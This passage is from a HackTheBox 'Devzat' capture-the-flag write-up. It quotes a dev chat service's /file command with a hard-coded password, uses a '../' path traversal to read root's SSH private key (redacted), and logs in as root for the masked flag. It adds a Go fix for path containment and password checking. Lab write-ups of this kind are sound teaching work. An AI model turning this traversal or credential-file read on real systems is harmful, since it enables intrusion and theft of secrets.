> 	if len(args) < 1 {
> 		u.system("Please provide file to print and the password")
> 		return
> 	}
> 
> 	if len(args) < 2 {
> 		u.system("You need to provide the correct password to use this function")
> 		return
> 	}
> 
> 	path := args[0]
> 	pass := args[1]
> 
> 	// Check my secure password
> 	if pass != "CeilingCatStillAThingIn2021?" {
> 		u.system("You did provide the wrong password")
> 		return
> 	}
> 
> 	// Get CWD
> 	cwd, err := os.Getwd()
> 	if err != nil {
> 		u.system(err.Error())
> 	}
> 
> 	// Construct path to print
> 	printPath := filepath.Join(cwd, path)
> 
> 	// Check if file exists
> 	if _, err := os.Stat(printPath); err == nil {
> 		// exists, print
> 		file, err := os.Open(printPath)
> 		if err != nil {
> 			u.system(fmt.Sprintf("Something went wrong opening the file: %+v", err.Error()))
> 			return
> 		}
> 		defer file.Close()
> 
> 		scanner := bufio.NewScanner(file)
> 		for scanner.Scan() {
> 			u.system(scanner.Text())
> 		}
> 
> 		if err := scanner.Err(); err != nil {
> 			u.system(fmt.Sprintf("Something went wrong printing the file: %+v", err.Error()))
> 		}
> 
> 		return
> 
> 	} else if os.IsNotExist(err) {
> 		// does not exist, print error
> 		u.system(fmt.Sprintf("The requested file @ %+v does not exist!", printPath))
> 		return
> 	}
> 	// bokred?
> 	u.system("Something went badly wrong.")
```
So the difference between the two environments is that dev has a /file command that never made it into main: it takes a path and a password hard-coded in the source, joins the path onto the process's working directory and prints the file
```diff
< 	commands = []commandInfo{clear, message, users, all, exit, bell, room, kick, id, _commands, nick, color, timezone, emojis, help, tictactoe, hangman, shrug, asciiArt, exampleCode}
---
> 	commands = []commandInfo{clear, message, users, all, exit, bell, room, kick, id, _commands, nick, color, timezone, emojis, help, tictactoe, hangman, shrug, asciiArt, exampleCode, file}
```
The dev environment also listens on a different port
```
$ cat devchat.go |grep "port ="
	port = 8443
```
So let's connect to it from the box and try the command
```
catherine@devzat:/var/backups$ ssh -l test localhost -p 8443
The authenticity of host '[localhost]:8443 ([127.0.0.1]:8443)' can't be established.
ED25519 key fingerprint is SHA256:liAkhV56PrAa5ORjJC5MU4YSl8kfNXp+QuljetKw0XU.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '[localhost]:8443' (ED25519) to the list of known hosts.
Welcome to the chat. There are no more users
devbot: test has joined the chat
test: /file
[SYSTEM] Please provide file to print and the password
```
It looks like we can read any file the chat process can reach: filepath.Join(cwd, path) cleans the path but never checks whether the result is still under cwd, so "../" walks out of it. Let's try to get root's SSH key
```
test: /file ../.ssh/id_rsa CeilingCatStillAThingIn2021?
[SYSTEM] -----BEGIN OPENSSH PRIVATE KEY-----
[SYSTEM] b3BlbnNzaC1rZXktdjEAAAAABG5vbmUAAAAEbm9uZQAAAAAAAAABAAAAMwAAAAtzc2gtZW
[SYSTEM] ......
[SYSTEM] ......
[SYSTEM] ......
[SYSTEM] .....
[SYSTEM] -----END OPENSSH PRIVATE KEY-----
test:
```
Bingo! We have it (the dev chat runs as root, so the traversal lands in /root/.ssh), though obviously we're not going to paste it here.
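As an added example (not code from the devzat project or from this writeup's author), the following reproduces the path resolution of the dev build's fileCommand, filepath.Join(cwd, path), next to a hypothetical contained version that refuses anything climbing out of the root, and replaces the hard-coded password comparison with a constant-time check against a digest that is supplied at deploy time rather than embedded in the source. The /root/devzat working directory, the containedPath and checkPassword names and the sample password are assumptions for the demo.

```go
package main

import (
	"crypto/sha256"
	"crypto/subtle"
	"fmt"
	"path/filepath"
	"strings"
)

// devPrintPath reproduces how the dev build resolves the requested file.
// filepath.Join cleans the result, so "../.ssh/id_rsa" quietly collapses
// to a path outside cwd instead of being rejected.
func devPrintPath(cwd, path string) string {
	return filepath.Join(cwd, path)
}

// containedPath is a hypothetical hardened replacement: join, then prove
// the cleaned result still lies under root before any os.Stat/os.Open.
// A relative result of ".." or starting with "../" means it escaped.
func containedPath(root, path string) (string, error) {
	root = filepath.Clean(root)
	full := filepath.Join(root, path)
	rel, err := filepath.Rel(root, full)
	if err != nil {
		return "", err
	}
	if rel == "." || rel == ".." || strings.HasPrefix(rel, ".."+string(filepath.Separator)) {
		return "", fmt.Errorf("%q is not a file inside %q", path, root)
	}
	return full, nil
}

// passwordDigest is how the deployment would precompute the expected value
// (assumed: stored in config or an environment variable, not in the code).
func passwordDigest(password string) [sha256.Size]byte {
	return sha256.Sum256([]byte(password))
}

// checkPassword replaces `pass != "CeilingCat..."`: no secret in the
// source, and the comparison is constant-time.
func checkPassword(expected [sha256.Size]byte, supplied string) bool {
	got := sha256.Sum256([]byte(supplied))
	return subtle.ConstantTimeCompare(got[:], expected[:]) == 1
}

func main() {
	cwd := "/root/devzat" // assumed working directory of the dev chat, which ran as root
	fmt.Println("dev build resolves ../.ssh/id_rsa to:", devPrintPath(cwd, "../.ssh/id_rsa"))
	if _, err := containedPath(cwd, "../.ssh/id_rsa"); err != nil {
		fmt.Println("contained version:", err)
	}
	expected := passwordDigest("correct horse battery staple") // demo value
	fmt.Println("wrong password accepted?", checkPassword(expected, "CeilingCatStillAThingIn2021?"))
}
```

Note that containedPath treats an absolute argument such as "/etc/passwd" as relative to root (Join yields /root/devzat/etc/passwd), which is the intended behaviour for a "print a file from my directory" command. On Go 1.20 and later, filepath.IsLocal does the same "does this stay inside" test on the raw argument and can be used before the Join. The bigger design issue stays the same either way: a chat service that reads arbitrary files should not be running as root.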
Getting the root flag
Now that we have root's key, we use it to SSH in and get the flag
```
$ ssh -i keys/root.pem root@devzat.htb
Welcome to Ubuntu 20.04.2 LTS (GNU/Linux 5.4.0-77-generic x86_64)

 * Documentation:  https://help.ubuntu.com
 * Management:     https://landscape.canonical.com
 * Support:        https://ubuntu.com/advantage

  System information as of Wed 12 Jan 2022 09:10:41 AM UTC

  System load:                      0.8
  Usage of /:                       60.0% of 7.81GB
  Memory usage:                     40%
  Swap usage:                       0%
  Processes:                        245
  Users logged in:                  1
  IPv4 address for docker0:         172.17.0.1
  IPv4 address for eth0:            10.10.11.118

107 updates can be applied immediately.
33 of these updates are standard security updates.
To see these additional updates run: apt list --upgradable

The list of available updates is more than a week old.
To check for new updates run: sudo apt update
Failed to connect to https://changelogs.ubuntu.com/meta-release-lts. Check your Internet connection or proxy settings

Last login: Mon Oct 11 14:28:01 2021
root@devzat:~# ls -l
total 12
drwxr-x--- 2 root root 4096 Jul 16 06:56 devzat
drwxr-xr-x 3 root root 4096 Jun 22  2021 go
-r-------- 1 root root   33 Jan 12 07:02 root.txt
root@devzat:~# cat root.txt
9xxxxxxxxxxxxxxxxxxxxxxxxxxxxxx6
root@devzat:~#
```
And we have our root flag, completing the machine and earning our points.
If you're a HackTheBox user and liked my writeup, please give me respect at the following link